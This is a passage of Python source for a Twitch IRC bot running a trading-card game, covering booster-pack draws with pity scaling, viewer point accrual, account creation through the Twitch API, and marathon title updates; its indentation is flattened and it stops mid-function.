memes = ["🤔", "🏆", "✌", "🌲", "🍀", "🖐", "👌", "🤑", "🤣", "🎄"]
def formatTimeDelta(ms, showMS=True):
output = str(datetime.timedelta(milliseconds=int(ms), microseconds=0))
if "." in output:
output = output[:-3] if showMS else output[:-7]
if "memeMode" in config and config["memeMode"] == "meme":
for i in range(10):
output = output.replace(str(i), memes[i])
return output
def parseRarity(input):
try:
rarity = int(input)
except Exception:
if input.lower() in revrarity:
rarity = revrarity[input.lower()]
else:
raise ValueError(input)
if rarity < 0 or rarity >= int(config["numNormalRarities"]) + int(config["numSpecialRarities"]):
raise ValueError(input)
return rarity
def parseBetTime(input):
match = time_regex.fullmatch(input)
if not match:
return None
bet = match.groupdict()
if bet["ms"] is None:
bet["ms"] = "0"
ms = int(bet["ms"] + ("0" * max(3 - len(bet["ms"]), 0)))
total = int(bet["hours"]) * 3600000 + int(bet["minutes"]) * 60000 + int(bet["seconds"]) * 1000 + ms
return {"hours": total // 3600000, "minutes": (total // 60000) % 60, "seconds": (total // 1000) % 60,
"ms": total % 1000, "total": total}
class CardNotInHandException(Exception):
pass
class CardIDNotInHandException(CardNotInHandException):
pass
class AmbiguousWaifuException(Exception):
pass
# given a string specifying a waifu id or card id, return card id of the hand card matching it
# throw various exceptions for invalid format / card not in hand / owns more than 1 copy of the waifu
def parseHandCardSpecifier(hand, specifier, rarity=None):
id = int(specifier)
if id < int(config["minimumCardID"]):
# waifuid
cardFound = None
for card in hand:
if card['waifuid'] == id and (rarity is None or rarity == card['rarity']):
if cardFound is None:
cardFound = card
else:
raise AmbiguousWaifuException()
if cardFound is None:
raise CardNotInHandException()
return cardFound
else:
for card in hand:
if card['cardid'] == id and (rarity is None or rarity == card['rarity']):
return card
raise CardIDNotInHandException()
class InvalidBoosterException(Exception):
pass
class CantAffordBoosterException(Exception):
def __init__(self, cost):
super(CantAffordBoosterException, self).__init__()
self.cost = cost
def getPackStats(userid):
with db.cursor() as cur:
cur.execute(
"SELECT bo.boostername, COUNT(*) FROM (SELECT id, boostername FROM boosters_opened WHERE userid = %s UNION SELECT id, boostername FROM archive_boosters_opened WHERE userid = %s) AS bo JOIN boosters ON (bo.boostername IN(boosters.name, CONCAT('mega', boosters.name))) WHERE boosters.cost > 0 GROUP BY bo.boostername ORDER BY COUNT(*) DESC",
[userid] * 2)
packstats = cur.fetchall()
return packstats
def getSpendings(userid):
with db.cursor() as cur:
cur.execute("SELECT spending FROM users WHERE id = %s", [userid])
result = cur.fetchall()
return int(result[0][0])
def getHandUpgradeLUT():
with db.cursor() as cur:
cur.execute("SELECT slot, spendings FROM handupgrades")
lut = cur.fetchall()
return lut
def getNextUpgradeSpendings(userid):
lut = getHandUpgradeLUT()
currSlots = paidHandUpgrades(userid)
paidSlots = currSlots
nextSpendings = 0
while currSlots >= len(lut) - 1:
currSlots -= 1
nextSpendings += 1000000
nextSpendings += lut[currSlots + 1][1]
return nextSpendings
def checkHandUpgrade(userid):
userid = int(userid)
nextSpendings = getNextUpgradeSpendings(userid)
spendings = getSpendings(userid)
logger.debug("next spendings: %d", nextSpendings)
logger.debug("current spendings: %d", spendings)
if spendings >= nextSpendings:
upgradeHand(userid)
logger.debug("Upgraded Hand for %d", userid)
return True
return False
def messageForHandUpgrade(userid, username, bot, channel, isWhisper):
bot.message(channel, "%s, you just got a new hand space from booster spending! naroYay" % username, isWhisper)
def addSpending(userid, amount):
with db.cursor() as cur:
cur.execute("UPDATE users SET spending=spending + %s WHERE id = %s", [amount, userid])
def addBooster(userid, boostername, paid, status, eventTokens, channel, isWhisper):
with db.cursor() as cur:
trueChannel = "$$whisper$$" if isWhisper else channel
cur.execute(
"INSERT INTO boosters_opened (userid, boostername, paid, created, status, eventTokens, channel) VALUES(%s, %s, %s, %s, %s, %s, %s)",
[userid, boostername, paid, current_milli_time(), status, eventTokens, trueChannel])
return cur.lastrowid
def openBooster(bot, userid, username, display_name, channel, isWhisper, packname, buying=True, mega=False):
with db.cursor() as cur:
rarityColumns = ", ".join(
"rarity" + str(i) + "UpgradeChance" for i in range(int(config["numNormalRarities"]) - 1))
if buying:
cur.execute(
"SELECT listed, buyable, cost, numCards, guaranteeRarity, guaranteeCount, useEventWeightings, maxEventTokens, eventTokenChance, canMega, " + rarityColumns + " FROM boosters WHERE name = %s AND buyable = 1",
[packname])
else:
cur.execute(
"SELECT listed, buyable, cost, numCards, guaranteeRarity, guaranteeCount, useEventWeightings, maxEventTokens, eventTokenChance, canMega, " + rarityColumns + " FROM boosters WHERE name = %s",
[packname])
packinfo = cur.fetchone()
if packinfo is None:
raise InvalidBoosterException()
listed = packinfo[0]
buyable = packinfo[1]
cost = packinfo[2]
numCards = packinfo[3]
pgRarity = packinfo[4]
pgCount = packinfo[5]
useEventWeightings = packinfo[6] != 0
numTokens = packinfo[7]
tokenChance = packinfo[8]
canMega = packinfo[9]
normalChances = packinfo[10:]
if numTokens >= numCards:
raise InvalidBoosterException()
iterations = 1
if mega:
if not canMega:
raise InvalidBoosterException()
iterations = 5
if buying:
if not hasPoints(userid, cost*iterations):
raise CantAffordBoosterException(cost*iterations)
addPoints(userid, -cost*iterations)
minScalingRarity = int(config["pullScalingMinRarity"])
maxScalingRarity = int(config["pullScalingMaxRarity"])
numScalingRarities = maxScalingRarity - minScalingRarity + 1
scalingThresholds = [int(config["pullScalingRarity%dThreshold" % rarity]) for rarity in
range(minScalingRarity, maxScalingRarity + 1)]
cur.execute("SELECT pullScalingData FROM users WHERE id = %s", [userid])
scalingRaw = cur.fetchone()[0]
if scalingRaw is None:
scalingData = [0] * numScalingRarities
else:
scalingData = [int(n) for n in scalingRaw.split(':')]
totalTokensDropped = 0
cards = []
alertwaifus = []
uniques = getUniqueCards(userid)
totalDE = 0
logPackName = "mega" + packname if mega else packname
for iter in range(iterations):
tokensDropped = 0
for n in range(numTokens):
if random.random() < tokenChance:
tokensDropped += 1
totalTokensDropped += tokensDropped
iterDE = 0
for i in range(numCards - tokensDropped):
# scale chances of the card appropriately
currentChances = list(normalChances)
guaranteedRarity = 0
if listed and buyable:
for rarity in range(maxScalingRarity, minScalingRarity - 1, -1):
scaleIdx = rarity - minScalingRarity
if scalingData[scaleIdx] >= scalingThresholds[scaleIdx] * 2:
# guarantee this rarity drops now
if rarity == int(config["numNormalRarities"]) - 1:
currentChances = [1] * len(currentChances)
else:
currentChances = ([1] * rarity) + [
functools.reduce((lambda x, y: x * y), currentChances[:rarity + 1])] + list(
currentChances[rarity + 1:])
guaranteedRarity = rarity
break
elif scalingData[scaleIdx] > scalingThresholds[scaleIdx]:
# make this rarity more likely to drop
oldPromoChance = currentChances[rarity - 1]
currentChances[rarity - 1] = min(currentChances[rarity - 1] * (
(scalingData[scaleIdx] / scalingThresholds[scaleIdx] - 1) * 2 + 1), 1)
if rarity != int(config["numNormalRarities"]) - 1:
# make rarities above this one NOT more likely to drop
currentChances[rarity] /= currentChances[rarity - 1] / oldPromoChance
# account for minrarity for some cards in the pack
if i < pgCount and pgRarity > guaranteedRarity:
if pgRarity == int(config["numNormalRarities"]) - 1:
currentChances = [1] * len(currentChances)
else:
currentChances = ([1] * pgRarity) + [
functools.reduce((lambda x, y: x * y), currentChances[:pgRarity + 1])] + list(
currentChances[pgRarity + 1:])
# actually drop the card
logger.debug("using odds for card %d: %s", i, str(currentChances))
card = int(dropCard(upgradeChances=currentChances, useEventWeightings=useEventWeightings,
bannedCards=uniques + cards))
cards.append(card)
# check its rarity and adjust scaling data
waifu = getWaifuById(card)
iterDE += int(config["rarity%dValue" % waifu['base_rarity']])
if waifu['base_rarity'] >= int(config["drawAlertMinimumRarity"]):
alertwaifus.append(waifu)
if listed and buyable:
for r in range(numScalingRarities):
if r + minScalingRarity != waifu['base_rarity']:
scalingData[r] += cost / (numCards - tokensDropped)
else:
scalingData[r] = 0
totalDE += iterDE
# did they win a free amount-based reward pack?
if packname in packAmountRewards and iterDE in packAmountRewards[packname]:
reward = packAmountRewards[packname][iterDE]
giveFreeBooster(userid, reward)
msgArgs = (reward, packname, iterDE, reward)
bot.message("#%s" % username, "You won a free %s pack due to getting a %s pack worth %d points. Open it with !freepacks open %s" % msgArgs, True)
cards.sort()
recordPullMetrics(*cards)
addSpending(userid, cost*iterations)
# pity pull data update
cur.execute("UPDATE users SET pullScalingData = %s, eventTokens = eventTokens + %s WHERE id = %s",
[":".join(str(round(n)) for n in scalingData), totalTokensDropped, userid])
# insert opened booster
boosterid = addBooster(userid, logPackName, cost*iterations if buying else 0, 'open', totalTokensDropped, channel, isWhisper)
for card in cards:
addCard(userid, card, 'booster', boosterid)
# alerts
alertname = display_name if display_name.lower() == username.lower() else "%s (%s)" % (display_name, username)
for w in alertwaifus:
threading.Thread(target=sendDrawAlert, args=(channel, w, alertname)).start()
return boosterid
def giveFreeBooster(userid, boostername, amount=1):
with db.cursor() as cur:
cur.execute("INSERT INTO freepacks (userid, boostername, remaining, total) VALUES(%s, %s, %s, %s)"
+ " ON DUPLICATE KEY UPDATE remaining = remaining + %s, total = total + %s",
[userid, boostername, amount, amount, amount, amount])
def infoCommandAvailable(userid, username, displayName, bot, channel, isWhisper):
with db.cursor() as cur:
private = isWhisper or channel == '#' + config['username'] or channel == '#' + username
columnName = "Private" if private else "Public"
cur.execute("SELECT infoUsed{0}, infoLastReset{0} FROM users WHERE id = %s".format(columnName), [userid])
limitData = list(cur.fetchone())
timeUntilReset = limitData[1] - (current_milli_time() - int(config["infoResetPeriod"]) * 60000)
if timeUntilReset <= 0:
limitData[0] = 0
cur.execute("UPDATE users SET infoUsed{0} = 0, infoLastReset{0} = %s WHERE id = %s".format(columnName),
[current_milli_time(), userid])
limit = int(config["infoLimit%s" % columnName])
if limitData[0] < limit:
return True
else:
timeDiff = formatTimeDelta(timeUntilReset, False)
if private:
bot.message(channel,
"%s, you have hit the rate limit for info commands. Please wait %s to use more." % (
displayName, timeDiff), isWhisper)
else:
bot.message(channel,
"%s, you have hit the rate limit for info commands in public chats. Please wait %s to use more or use them via whisper or in the bot's own chat." % (
displayName, timeDiff), isWhisper)
return False
def useInfoCommand(userid, username, channel, isWhisper):
with db.cursor() as cur:
private = isWhisper or channel == '#' + config['username'] or channel == '#' + username
columnName = "Private" if private else "Public"
cur.execute("UPDATE users SET infoUsed{0} = infoUsed{0} + 1 WHERE id = %s".format(columnName), [userid])
def generateRewardsSeed(cycleLength, numGoodRewards):
# generate a reasonable rewards seed
# "reasonable" is defined as the gap between successive good rewards
# being between (CL/NumGood)/2 and (CL/NumGood)*2 every time
# where gap is 1, not 0, for two consecutive good rewards
# uses 0 to (numGoodRewards-1) to represent the good rewards
# and other numbers to represent the bad
hasSeed = False
while not hasSeed:
seed = random.randrange(0, 0x10000000000000000)
if numGoodRewards == 0 or cycleLength == numGoodRewards:
return seed
generator = random.Random(seed)
order = [x for x in range(cycleLength)]
generator.shuffle(order)
hasSeed = True
lastPos = -1
for i in range(int(numGoodRewards)):
pos = lastPos + 1
while order[pos] >= numGoodRewards:
pos += 1
if pos - lastPos <= (cycleLength/numGoodRewards)/2 or pos - lastPos >= (cycleLength/numGoodRewards)*2:
hasSeed = False
break
lastPos = pos
if cycleLength - lastPos >= (cycleLength/numGoodRewards)*2:
hasSeed = False
return seed
# returns (cycle length, number of good rewards) for use elsewhere
def getRewardsMetadata():
with db.cursor() as cur:
cur.execute("SELECT COUNT(*), SUM(IF(is_good != 0, 1, 0)) FROM free_rewards")
return cur.fetchone()
# From https://github.com/Shizmob/pydle/issues/35
class PrivMessageTagSupport(pydle.features.ircv3.TaggedMessageSupport):
def on_raw_privmsg(self, message):
""" PRIVMSG command. """
nick, metadata = self._parse_user(message.source)
tags = message.tags
target, message = message.params
self._sync_user(nick, metadata)
self.on_message(target, nick, message, tags)
if self.is_channel(target):
self.on_channel_message(target, nick, message, tags)
else:
self.on_private_message(nick, message, tags)
# End Github code
NepBotClass = pydle.featurize(pydle.Client, PrivMessageTagSupport)
class NepBot(NepBotClass):
config = {}
mychannels = []
instance = None
autoupdate = False
pw = None
nomodalerted = []
addchannels = []
leavechannels = []
emotecooldowns = {}
def __init__(self, config, channels):
super().__init__(config["username"])
self.config = config
self.mychannels = channels
NepBot.instance = self
def on_clearchat(self, message):
# print("Got clear chat message: " + str(message))
nick, metadata = self._parse_user(message.source)
tags = message.tags
params = message.params
logger.debug(
"nick: {nick}; metadata: {metadata}; params: {params}; tags: {tags}".format(nick=nick, metadata=metadata,
params=params, tags=tags))
if len(params) == 1:
logger.info("Chat in %s has been cleared by a moderator.", params[0])
return
u = params[1]
chan = params[0]
reason = "" if "ban-reason" not in tags else str(tags["ban-reason"]).replace("\\s", " ")
if "ban-duration" in tags.keys():
duration = tags["ban-duration"]
logger.info("%s got timed out for %s seconds in %s for: %s", u, duration, chan, reason)
else:
logger.info("%s got permanently banned from %s. Reason: %s", u, chan, reason)
return
def on_hosttarget(self, message):
# print("Got Host Target: " + str(message))
parts = str(message).split(" ")
sourcechannel = parts[2].strip("#")
target = parts[3].strip(":")
if target == "-":
logger.info("%s has stopped hosting", sourcechannel)
else:
logger.info("%s is now hosting %s", sourcechannel, target)
return
def on_userstate(self, message):
# print("Userstate...")
nick, metadata = self._parse_user(message.source)
tags = message.tags
params = message.params
logger.debug(
"nick: {nick}; metadata: {metadata}; params: {params}; tags: {tags}".format(nick=nick, metadata=metadata,
params=params, tags=tags))
if config["username"].lower() == "nepnepbot" and tags["display-name"] == "Nepnepbot" and params[
0] != "#nepnepbot" and tags["mod"] != '1' and params[0] not in self.nomodalerted:
logger.info("No Mod in %s!", str(params[0]))
self.nomodalerted.append(params[0])
self.message(params[0], "Hey! I noticed i am not a mod here! Please do mod me to avoid any issues!")
return
def on_roomstate(self, message):
# print("Got Room State: " + str(message))
return
def on_raw_421(self, message):
# print("Got raw 421:" + str(message))
# Ignore twitch not knowing WHOIS
if str(message).find("WHOIS") > -1:
return
super().on_raw_421(message)
def on_whisper(self, message):
nick, metadata = self._parse_user(message.source)
tags = message.tags
params = message.params
# print("WHISPER received: nick: {nick}; metadata: {metadata}; params: {params}; tags: {tags}".format(nick=nick, metadata=metadata, params=params, tags=tags))
self.on_message("#" + str(nick), str(nick), str(params[1]), tags, isWhisper=True)
def on_unknown(self, message):
if str(message).find("WHISPER") > -1:
self.on_whisper(message)
return
if str(message).find("CLEARCHAT") > -1:
self.on_clearchat(message)
return
if str(message).find("HOSTTARGET") > -1:
self.on_hosttarget(message)
return
if str(message).find("USERSTATE") > -1:
self.on_userstate(message)
return
if str(message).find("ROOMSTATE") > -1:
self.on_roomstate(message)
return
if str(message).find("USERNOTICE") > -1:
logger.info("PogChamp! Someone subbed to someone! here's the message: %s", str(message))
return
super().on_unknown(message)
def handleNameChange(self, oldName, newName):
return self.handleNameChanges({oldName: newName})
def handleNameChanges(self, nameMapping):
with db.cursor() as cur:
oldNames = list(nameMapping)
cur.execute("SELECT name FROM channels WHERE name IN(%s)" % ",".join(["%s" * len(oldNames)]), oldNames)
channelsFound = [row[0] for row in cur.fetchall()]
for oldName in channelsFound:
newName = nameMapping[oldName]
hOldName = "#" + oldName
hNewName = "#" + newName
# channel name changed, attempt to deal with it
try:
logger.debug("Attempting to handle channel name change %s -> %s..." % (oldName, newName))
cur.execute("UPDATE channels SET name = %s WHERE name = %s", [newName, oldName])
cur.execute("UPDATE bets SET channel = %s WHERE channel = %s", [hNewName, hOldName])
cur.execute("UPDATE boosters_opened SET channel = %s WHERE channel = %s", [hNewName, hOldName])
self.join(hNewName)
self.addchannels.append(hNewName)
self.leavechannels.append(hOldName)
self.part(hOldName)
logger.debug("OK, should be successful.")
except Exception:
logger.debug("Could not handle name change properly, abandoning the attempt.")
def start(self, password):
pool.connect(self, "irc.twitch.tv", 6667, tls=False, password=password)
self.pw = password
logger.info("Connecting...")
def timer():
with busyLock:
global t
t = Timer(int(config["cycleLength"]), timer)
t.start()
logger.debug("Refreshing Database Connection...")
global db
try:
db.close()
except Exception:
logger.warning("Error closing db connection cleanly, ignoring.")
try:
db = pymysql.connect(host=dbhost, user=dbuser, passwd=dbpw, db=dbname, autocommit="True",
charset="utf8mb4")
except Exception:
logger.error("Error Reconnecting to DB. Skipping Timer Cycle.")
return
with db.cursor() as cur:
# open packs?
cur.execute(
"SELECT boosters_opened.id, boosters_opened.userid, users.name FROM boosters_opened JOIN users ON boosters_opened.userid = users.id WHERE status = 'open' AND created <= %s",
[current_milli_time() - int(config["boosterTimeout"])])
packsToClose = cur.fetchall()
for pack in packsToClose:
userid = pack[1]
cur.execute("SELECT id FROM cards WHERE boosterid = %s ORDER BY waifuid ASC",
[pack[0]])
cardIDs = [row[0] for row in cur.fetchall()]
cards = [getCard(card) for card in cardIDs]
waifuIDs = [card['waifuid'] for card in cards]
# keep the best cards
cards.sort(key=lambda card: -card['base_rarity'])
# count any cards in the pack that don't take up hand space
# we can use this as a shortcut since these will always be the highest rarities too
nonSpaceCards = sum((1 if card['base_rarity'] >= int(config["numNormalRarities"]) else 0) for card in cards)
numKeep = int(min(max(handLimit(userid) - currentCards(userid), 0) + nonSpaceCards, len(cards)))
keeps = cards[:numKeep]
des = cards[numKeep:]
logger.info("Expired pack for user %s (%d): keeping %s, disenchanting %s", pack[2], userid,
str(keeps), str(des))
for card in keeps:
updateCard(card['id'], {"boosterid": None})
numPoints = 0
for card in des:
numPoints += disenchant(self, card['id'])
addPoints(userid, numPoints)
attemptPromotions(*waifuIDs)
cur.execute("UPDATE boosters_opened SET status='closed', updated = %s WHERE id = %s",
[current_milli_time(), pack[0]])
# inactivity timeout
# cur.execute("SELECT DISTINCT users.id, users.name FROM cards JOIN users ON cards.userid = users.id WHERE cards.rarity < %s AND users.inactivityImmunity = 0 AND (users.lastActiveTimestamp IS NULL OR users.lastActiveTimestamp < %s)", [config["numNormalRarities"], current_milli_time() - int(config["inactivityTimeoutDays"])*86400000])
# inactiveUsers = cur.fetchall()
# expireCount = len(inactiveUsers)
# expireCardCount = 0
# while len(inactiveUsers) > 0:
# inactiveSlice = inactiveUsers[:100]
# inactiveUsers = inactiveUsers[100:]
# logger.debug("Expiring users: "+(", ".join(row[1] for row in inactiveSlice)))
# expireCardCount += cur.execute("UPDATE cards SET userid = NULL, boosterid = NULL WHERE rarity < %s AND userid IN("+(",".join(["%s"] * len(inactiveSlice)))+")", [config["numNormalRarities"]] + [row[0] for row in inactiveSlice])
# if expireCardCount > 0:
# logger.debug("Expired %d cards from %d users" % (expireCardCount, expireCount))
# increase weightings
if int(config["last_weighting_update"]) < current_milli_time() - int(
config["weighting_increase_cycle"]):
logger.debug("Increasing card weightings...")
baseIncrease = float(config["weighting_increase_amount"])
cur.execute("UPDATE waifus SET normal_weighting = normal_weighting * %s WHERE base_rarity < %s",
[baseIncrease, int(config["strongerWeightingMinRarity"])])
cur.execute("UPDATE waifus SET normal_weighting = normal_weighting * %s WHERE base_rarity BETWEEN %s AND %s",
[baseIncrease**2, int(config["strongerWeightingMinRarity"]), int(config["numNormalRarities"])-1])
config["last_weighting_update"] = str(current_milli_time())
cur.execute("UPDATE config SET value = %s WHERE name = 'last_weighting_update'",
[config["last_weighting_update"]])
# rounding edge case
cur.execute("UPDATE waifus SET normal_weighting=1 WHERE normal_weighting BETWEEN 0.999 AND 1")
# pudding expiry?
now = datetime.datetime.now()
ymdNow = now.strftime("%Y-%m-%d")
if ymdNow > config["last_pudding_check"]:
logger.debug("Processing pudding expiry...")
config["last_pudding_check"] = ymdNow
cur.execute("UPDATE config SET value = %s WHERE name = 'last_pudding_check'", [ymdNow])
if now.day == 1:
# move pudding down a category, alert people with expiring pudding
cur.execute("UPDATE users SET puddingExpiring = puddingPrevious, puddingPrevious = puddingCurrent, puddingCurrent = 0")
cur.execute("SELECT name, puddingExpiring FROM users WHERE puddingExpiring > 0")
for userRow in cur.fetchall():
self.message("#%s" % userRow[0], "You have %d pudding expiring on the 8th of this month. !pudding to see your balance and to spend it." % userRow[1], True)
elif now.day == 8:
# actually expire pudding from 2 months ago
cur.execute("UPDATE users SET puddingExpiring = 0")
if booleanConfig("cpuWarActive") and now.minute < 5:
cpuVoters.clear()
self.message(config["marathonChannel"], "**You can now cast your votes for a CPU again!**", False)
logger.debug("Checking live status of channels...")
with busyLock:
checkAndRenewAppAccessToken()
cur = db.cursor()
cur.execute("SELECT users.name, users.id FROM channels JOIN users ON channels.name = users.name")
rows = cur.fetchall()
cur.close()
channelids = []
idtoname = {}
isLive = {}
viewerCount = {}
for row in rows:
channelids.append(str(row[1]))
idtoname[str(row[1])] = row[0]
isLive[str(row[0])] = False
while len(channelids) > 0:
currentSlice = channelids[:100]
response = requests.get("https://api.twitch.tv/helix/streams", headers=headers,
params={"type": "live", "user_id": currentSlice})
data = response.json()["data"]
for element in data:
chanName = idtoname[str(element["user_id"])]
isLive[chanName] = True
logger.debug("%s is live!", idtoname[str(element["user_id"])])
viewerCount[chanName] = element["viewer_count"]
channelids = channelids[100:]
marathonLive = config['marathonChannel'][1:] in viewerCount
logger.debug("Catching all viewers...")
for c in self.addchannels:
self.mychannels.append(c)
self.addchannels = []
for c in self.leavechannels:
try:
self.mychannels.remove(c)
except Exception:
logger.warning("Couldn't remove channel %s from channels, it wasn't found. Channel list: %s",
str(c), str(self.mychannels))
self.leavechannels = []
try:
# print("Activitymap: " + str(activitymap))
doneusers = set([])
validactivity = set([])
for channel in self.channels:
# print("Fetching for channel " + str(channel))
channelName = str(channel).replace("#", "")
try:
a = []
if channelName in viewerCount and viewerCount[channelName] >= 800:
logger.debug("%s had more than 800 viewers, catching from chatters endpoint", channelName)
with urllib.request.urlopen(
'https://tmi.twitch.tv/group/user/' + channelName + '/chatters') as response:
data = json.loads(response.read().decode())
chatters = data["chatters"]
a = chatters["moderators"] + chatters["staff"] + chatters["admins"] + chatters[
"global_mods"] + chatters["viewers"]
else:
logger.debug("Users in %s: %s", channel, self.channels[channel]['users'])
for viewer in self.channels[channel]['users']:
a.append(viewer)
doneusers.update(set(a))
if isLive[channelName]:
validactivity.update(set(a))
except Exception:
logger.error("Error fetching chatters for %s, skipping their chat for this cycle" % channelName)
logger.error("Error: %s", str(sys.exc_info()))
# process all users
logger.debug("Caught users, giving points and creating accounts, amount to do = %d" % len(doneusers))
newUsers = set([])
maxPointsInactive = int(config["maxPointsInactive"])
overflowPoints = 0
passivePoints = int(config["passivePoints"])
pointsMult = float(config["pointsMultiplier"])
maraPointsMult = float(config["marathonPointsMultiplier"])
doneusers = list(doneusers)
with busyLock:
with db.cursor() as cur:
cur.execute('START TRANSACTION')
while len(doneusers) > 0:
logger.debug('Slicing... remaining length: %s' % len(doneusers))
currentSlice = doneusers[:100]
cur.execute("SELECT name, points, lastActiveTimestamp FROM users WHERE name IN(%s)" % ",".join(["%s"] * len(currentSlice)), currentSlice)
foundUsersData = cur.fetchall()
foundUsers = set([row[0] for row in foundUsersData])
newUsers.update(set(currentSlice) - foundUsers)
if len(foundUsers) > 0:
updateData = []
for viewerInfo in foundUsersData:
pointGain = passivePoints
if viewerInfo[0] in activitymap and viewerInfo[0] in validactivity:
pointGain += max(10 - int(activitymap[viewerInfo[0]]), 0)
if viewerInfo[0] in marathonActivityMap and marathonActivityMap[viewerInfo[0]] < 10 and marathonLive:
altPointGain = passivePoints + 10 - marathonActivityMap[viewerInfo[0]]
altPointGain = round(altPointGain * maraPointsMult)
pointGain = max(pointGain, altPointGain)
pointGain = int(pointGain * pointsMult)
if viewerInfo[2] is None:
maxPointGain = max(maxPointsInactive - viewerInfo[1], 0)
if pointGain > maxPointGain:
overflowPoints += pointGain - maxPointGain
pointGain = maxPointGain
if pointGain > 0:
updateData.append((pointGain, viewerInfo[0]))
cur.executemany("UPDATE users SET points = points + %s WHERE name = %s", updateData)
doneusers = doneusers[100:]
cur.execute('COMMIT')
if overflowPoints > 0:
logger.debug("Paying %d overflow points to the bot account" % overflowPoints)
with busyLock:
cur = db.cursor()
cur.execute("UPDATE users SET points = points + %s WHERE name = %s",
[overflowPoints, config["username"]])
cur.close()
# now deal with user names that aren't already in the DB
newUsers = list(newUsers)
if len(newUsers) > 10000:
logger.warning(
"DID YOU LET ME JOIN GDQ CHAT OR WHAT?!!? ... capping new user accounts at 10k. Sorry, bros!")
newUsers = newUsers[:10000]
updateNames = []
newAccounts = []
updateData = []
# don't hold the busyLock the whole time here - since we're dealing with twitch API
while len(newUsers) > 0:
logger.debug("Adding new users...")
currentSlice = newUsers[:100]
logger.debug("New users to add: %s", str(currentSlice))
r = requests.get("https://api.twitch.tv/helix/users", headers=headers,
params={"login": currentSlice})
if r.status_code == 429:
logger.warning("Rate Limit Exceeded! Skipping account creation!")
r.raise_for_status()
j = r.json()
if "data" not in j:
# error, what do?
r.raise_for_status()
currentIdMapping = {int(row["id"]): row["login"] for row in j["data"]}
logger.debug("currentIdMapping: %s", currentIdMapping)
foundIdsData = []
if len(currentIdMapping) > 0:
with busyLock:
with db.cursor() as cur:
cur.execute("SELECT id, name FROM users WHERE id IN(%s)" % ",".join(["%s"] * len(currentIdMapping)),
[id for id in currentIdMapping])
foundIdsData = cur.fetchall()
localIds = [row[0] for row in foundIdsData]
oldIdMapping = {row[0] : row[1] for row in foundIdsData}
# users to update the names for (id already exists)
updateNames.extend([(currentIdMapping[id], id) for id in currentIdMapping if id in localIds])
nameChanges = {oldIdMapping[id] : currentIdMapping[id] for id in currentIdMapping if id in localIds}
if len(nameChanges) > 0:
with busyLock:
self.handleNameChanges(nameChanges)
# new users (id does not exist)
newAccounts.extend([(id, currentIdMapping[id]) for id in currentIdMapping if id not in localIds])
# actually give points
for id in currentIdMapping:
viewer = currentIdMapping[id]
pointGain = passivePoints
if viewer in activitymap and viewer in validactivity:
pointGain += max(10 - int(activitymap[viewer]), 0)
if viewer in marathonActivityMap and marathonActivityMap[viewer] < 10 and marathonLive:
altPointGain = passivePoints + 10 - marathonActivityMap[viewer]
altPointGain = round(altPointGain * maraPointsMult)
pointGain = max(pointGain, altPointGain)
pointGain = int(pointGain * pointsMult)
updateData.append((pointGain, viewer))
# done with this slice
newUsers = newUsers[100:]
# push new user data to database
with busyLock:
with db.cursor() as cur:
cur.execute("START TRANSACTION")
if len(updateNames) > 0:
logger.debug("Updating names...")
cur.executemany("UPDATE users SET name = %s WHERE id = %s", updateNames)
if len(newAccounts) > 0:
cur.executemany("INSERT INTO users (id, name, points, lastFree) VALUES(%s, %s, 0, 0)",
newAccounts)
if len(updateData) > 0:
cur.executemany("UPDATE users SET points = points + %s WHERE name = %s", updateData)
cur.execute("COMMIT")
for user in activitymap:
activitymap[user] += 1
for user in marathonActivityMap:
marathonActivityMap[user] += 1
except Exception:
logger.warning("We had an error during passive point gain. skipping this cycle.")
logger.warning("Error: %s", str(sys.exc_info()))
logger.warning("Last run query: %s", cur._last_executed)
if self.autoupdate and booleanConfig("marathonBotFunctions"):
logger.debug("Updating Title and Game with horaro info")
schedule = getHoraro()
try:
data = schedule["data"]
ticker = data["ticker"]
current = ticker["current"]
wasNone = False
if current is None:
current = ticker["next"]
wasNone = True
current = current["data"]
game = current[int(config["horaroGameColumn"])]
category = current[int(config["horaroCategoryColumn"])]
rStart = int(config["horaroFirstRunnerColumn"])
rNum = int(config["horaroNumRunnerColumns"])
runners = [getRawRunner(runner) for runner in current[rStart:rStart + rNum] if runner is not None]
args = {"game": game}
args["category"] = " (%s)" % category if category is not None else ""
args["comingup"] = "COMING UP: " if wasNone else ""
args["runners"] = (" by " + ", ".join(runners)) if len(runners) > 0 else ""
args["title"] = config["marathonTitle"]
args["command"] = config["marathonHelpCommand"]
title = "{comingup}{title} - {game}{category}{runners} - !{command} in chat".format(**args)
twitchGame = game
if data["schedule"]["columns"][-1] == "TwitchGame" and current[-1] is not None:
twitchGame = current[-1]
updateBoth(twitchGame, title=title)
if len(runners) > 0:
thread.start_new_thread(MarathonBot.instance.updateFollowButtons, (runners,))
except Exception:
logger.warning("Error updating from Horaro. Skipping this cycle.")
logger.warning("Error: %s", str(sys.exc_info()))
if booleanConfig("marathonHelpAutopost"):
nextPost = int(config["marathonHelpAutopostLast"]) + int(config["marathonHelpAutopostPeriod"]) * 1000
if nextPost <= current_milli_time():
self.message(config["marathonChannel"], config["marathonHelpCommandText"], False)
config["marathonHelpAutopostLast"] = str(current_milli_time())
with busyLock:
with db.cursor() as cur:
cur.execute("UPDATE config SET value = %s WHERE name = 'marathonHelpAutopostLast'",
[config["marathonHelpAutopostLast"]])
if t is None:
timer()
def on_capability_twitch_tv_membership_available(self, nothing=None):
logger.debug("WE HAS TWITCH MEMBERSHIP AVAILABLE!")
return True
def on_capability_twitch_tv_membership_enabled(self, nothing=None):
logger.debug("WE HAS TWITCH MEMBERSHIP ENABLED!")
return
def on_capability_twitch_tv_tags_available(self, nothing=None):
logger.debug("WE HAS TAGS AVAILABLE!")
return True
def on_capability_twitch_tv_tags_enabled(self, nothing=None):
logger.debug("WE HAS TAGS ENABLED!")
return
def on_capability_twitch_tv_commands_available(self, nothing=None):
logger.debug("WE HAS COMMANDS AVAILABLE!")
return True
def on_capability_twitch_tv_commands_enabled(self, nothing=None):
logger.debug("WE HAS COMMANDS ENABLED!")
return
def on_disconnect(self, expected):
logger.error("Disconnected, reconnecting. Was it expected? %s", str(expected))
pool.connect(self, "irc.twitch.tv", 6667, tls=False, password=self.pw, reconnect=True)
def on_connect(self):
logger.info("Connected! joining channels...")
super().on_connect()
for channel in self.mychannels:
channel = channel.lower()
logger.debug("Joining %s...", channel)
self.join(channel)
def on_raw(self, message):
# print("Raw message: " + str(message))
super().on_raw(message)
def on_private_message(self, nick, message, tags):
super().on_private_message(nick, message)
return
def on_channel_message(self, target, nick, message, tags):
super().on_channel_message(target, nick, message)
return
def on_message(self, source, target, message, tags, isWhisper=False):
if isWhisper:
